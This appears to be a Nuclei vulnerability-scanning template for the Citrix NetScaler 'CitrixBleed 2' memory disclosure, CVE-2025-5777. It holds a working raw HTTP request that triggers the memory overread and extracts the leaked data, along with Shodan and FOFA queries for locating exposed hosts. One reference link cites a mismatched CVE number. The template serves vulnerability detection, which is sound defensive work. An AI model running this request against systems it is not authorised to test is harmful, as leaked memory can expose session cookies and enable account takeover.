id: CVE-2025-5777 info: name: Citrix NetScaler Memory Disclosure - CitrixBleed 2 author: CyberTechAjju severity: critical description: | Insufficient input validation on the NetScaler Management Interface allows for memory overread, potentially leaking sensitive information including session cookies. reference: - https://github.com/cyberajju/cve-2025-5755 - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ - https://nvd.nist.gov/vuln/detail/CVE-2025-5777 classification: epss-score: 0.00042 epss-percentile: 0.12361 metadata: verified: true max-request: 1 shodan-query: - http.html:"_ctxstxt_NetscalerAAA" - title:"NetScaler Gateway" - title:"NetScaler AAA" - http.favicon.hash:-1166125415 - http.favicon.hash:-1292923998 fofa-query: - title="NetScaler Gateway" - title="NetScaler AAA" - icon_hash="-1166125415" - icon_hash="-1292923998" tags: cve,cve2025,netscaler,citrix2,exposure http: - raw: - |+ POST /p/u/doAuthentication.do HTTP/1.0 Host: {{Hostname}} bleed_attack: {{iteration}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 5 login unsafe: true payloads: iteration: - "{{rand_int(1,5)}}" extractors: - type: regex name: iv part: body regex: - '([^<]{10,})' internal: true stop-at-first-match: true matchers: - type: dsl dsl: - 'len(iv) > 0' - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")' - '!contains(to_string(iv), "false")' - '!contains(to_string(iv), "true")' - '!contains(to_string(iv), "")' condition: and # digest: 4a0a0047304502206b67756161e3b05759fd9b89e48fc20df8b936eb68641538bf775f6622acb3cb022100a66c907bf2dc255cf92f5d45b38725b3fb77795d037772f710e8f78ed0c503bd:922c64590222798bb761d5b6d8e72950